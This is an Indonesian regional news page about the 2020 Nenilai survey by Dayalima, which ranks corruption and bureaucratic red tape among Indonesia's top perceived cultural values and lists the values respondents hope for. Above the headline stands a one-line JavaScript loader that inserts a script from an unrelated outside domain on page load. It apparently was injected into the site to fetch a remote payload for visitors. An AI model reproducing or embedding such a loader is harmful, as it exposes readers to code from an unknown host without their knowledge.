(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Survei Nenilai: Korupsi Masuk 5 Besar Nilai-nilai Budaya Indonesia


KANALKALIMANTAN.COM – Sebagai sebuah bangsa yang besar, pernahkah Anda berpikir mengenai nilai-nilai budaya Indonesia apa yang dipercaya masih diterapkan hingga saat ini?

Untuk menjawab pertanyaan itu, sebuah survei identifikasi individu, komunitas dan bangsa yang disebut Nenilai dilakukan oleh perusahaan konsultan Dayalima pada tahun 2020 lalu.

Survei ini dilakukan pada 50.452 responden. Hasilnya ditemukan, nilai budaya yang dipercaya masih diterapkan masyarakat Indonesia adalah budaya gotong royong dengan 39 persen.

Menariknya, birokrasi atau aturan berbelit masuk jajaran nilai budaya kedua tertinggi dengan angka 37 persen, diikuti nilai berpegang dengan aturan agama sebesar 36 persen, budaya korupsi sebesar 34 persen dan nilai keberagaman dengan 32 persen.

 

 

Itu artinya, dua dari lima nilai utama dari budaya orang Indonesia adalah praktek negatif yang sayangnya masih diterapkan hingga kini.

Baca juga: RESMI! Tahura Sultan Adam Dibuka, Pengunjung Dibatasi, Ini Link Pendaftaran Masuk

Menurut Director Dayalima Abisatya Mieke Malaon, hasil dari survei ini nantinya akan dikomunikasikan kepada publik dan menjadi basis untuk pembangunan bangsa yang berkelanjutan.

“Kami di Dayalima beberapa tahun belakangan merasakan adanya banyak perbedaan dan gesekan di sebagian masyarakat Indonesia akibat perbedaan yang ada. Untuk itu, dalam membantu organisasi memahami budaya perusahaan, kami juga menanamkan nilai-nilai budaya ini pada setiap individu di organisasi tersebut,” kata Mieke dikutip Suara.com -jaringan Kanalkalimantan.com- dari siaran pers, Jumat (11/6/2021).

Ia melanjutkan, tahun ini Nenilai mengusung tema kampanye “Suara Masa Depan” yang merupakan gerakan untuk menampung aspirasi dan membangun optimisme masyarakat Indonesia.

Gerakan ini diharapkan mentransformasi nilai-nilai masyarakat serta mewadahi tiap harapan individu dan komunitas demi terciptanya Indonesia maju. Program-program dalam Suara Masa Depan disusun untuk mendorong terjadinya dialog serta meningkatkan pendewasaan bangsa.

Managing Director Stoik Trisula Keenan Pearce menjelaskan, beberapa program yang telah dirancang pada tahun 2021 selain Laporan Survei Nenilai adalah Program Edukasi dan Pembangunan Karakter melalui Dialog Komunitas dan Dialog Nasional, Pelatihan Tata Cara Dialog, sera Festival Film Pendek Nenilai.

“Indonesia merupakan negara dengan beragam nilai kebudayaan dan kesenian. Agar nilai-nilai tersebut mempu tersampaikan dan menjadi sebuah dialog di sebuah komunitas, perlu diimplementasikan kedalam program-program yang mudah diterima dan dipahami oleh seluruh lapisan masyarakat,” ungkap Keenan.

Berikut adalah hasil survei Nenilai mengenai nilai budaya saat ini dan nilai budaya yang diharapkan oleh bangsa Indonesia;

Baca juga: Melindungi Perempuan dan Anak dari KDRT, Pelecehan Seksual hingga Prostitusi Online

Nilai Budaya Saat Ini:

Gotong Royong 39%
Birokrasi/ Aturan Berbelit Belit 37%
Berpegang Pada Aturan Agama 36%
Korupsi 34%
Keberagaman/Kebhinekaan 32%
Demokrasi 31%
Diskriminasi SARA 32%
Dominasi Kaum Elit 27%
Berpikir Jangka Pendek 26%
Hak Asasi Manusia 26%

Nilai Budaya yang Diharapkan:

Adil/Keadilan 69%
Keadilan Sosial 45%
Hak Asasi Manusia 44%
Gotong Royong 42%
Demokrasi 39%
Berpikir Jangka Panjang 37%
Bertanggung Jawab 36%
Integritas/Kejujuran 33%
Kemakmuran 32%
Hidup yang Berkualitas 31%. (Suara.com)

Editor : kk


Al Ghifari

Recent Posts

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

6 jam ago

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

7 jam ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

8 jam ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

8 jam ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

9 jam ago

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

11 jam ago

This website uses cookies.